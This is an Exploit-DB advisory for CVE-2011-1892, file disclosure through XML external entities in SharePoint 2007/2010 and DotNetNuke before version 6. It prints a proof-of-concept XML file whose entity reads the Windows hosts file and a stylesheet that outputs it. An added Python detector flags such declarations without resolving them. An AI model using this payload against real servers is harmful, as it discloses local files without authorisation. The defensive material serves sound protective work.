SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE

2011-09-20T00:00:00
ID EDB-ID:17873
Type exploitdb
Reporter Nicolas Gregoire
Modified 2011-09-20T00:00:00

Description

SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE. CVE-2011-1892. Webapps exploit for the Windows platform.

                                        
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892

poc filename: xee.xml

<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>

poc filename: xee.xsl

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:apply-templates/>
    <xsl:value-of select="doc"/>
  </xsl:template>
</xsl:stylesheet>
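
A defensive pre-parse check for the xee.xml pattern above, as an added example that is not part of the original advisory: it uses Python's expat bindings to list the external identifiers a document's DTD declares, without resolving any of them, so an upload handler can reject such input. The function name and the benign sample are assumptions made for illustration.

```python
"""List DTD external identifiers in an XML upload without resolving them."""
import xml.parsers.expat as expat

# The xee.xml document from this advisory, reproduced as test input.
PAGE_POC = rb'''<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>'''

# Constructed benign sample: an internal entity only, nothing external.
BENIGN = b'<!DOCTYPE doc [<!ENTITY who "world">]><doc>hello &who;</doc>'


def external_references(xml_bytes):
    """Return (findings, well_formed).

    Each finding is (kind, name, system_id, public_id) for a DOCTYPE or
    entity declaration that points outside the document.
    """
    findings = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # External DTD subset, e.g. <!DOCTYPE doc SYSTEM "...">
        if system_id or public_id:
            findings.append(("doctype", name, system_id, public_id))

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry replacement text in `value` and no identifiers.
        if system_id or public_id:
            kind = "parameter-entity" if is_parameter else "entity"
            findings.append((kind, name, system_id, public_id))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is installed, so expat never opens system_id.
    try:
        parser.Parse(xml_bytes, True)
        return findings, True
    except expat.ExpatError:
        # Malformed input: still report what was declared before the error.
        return findings, False


if __name__ == "__main__":
    for label, doc in (("page PoC", PAGE_POC), ("benign", BENIGN)):
        print(label, external_references(doc))
```

Rejecting any document that produces findings is a filter in front of the real parser; disabling DTD processing and external resolution in that parser remains the primary control.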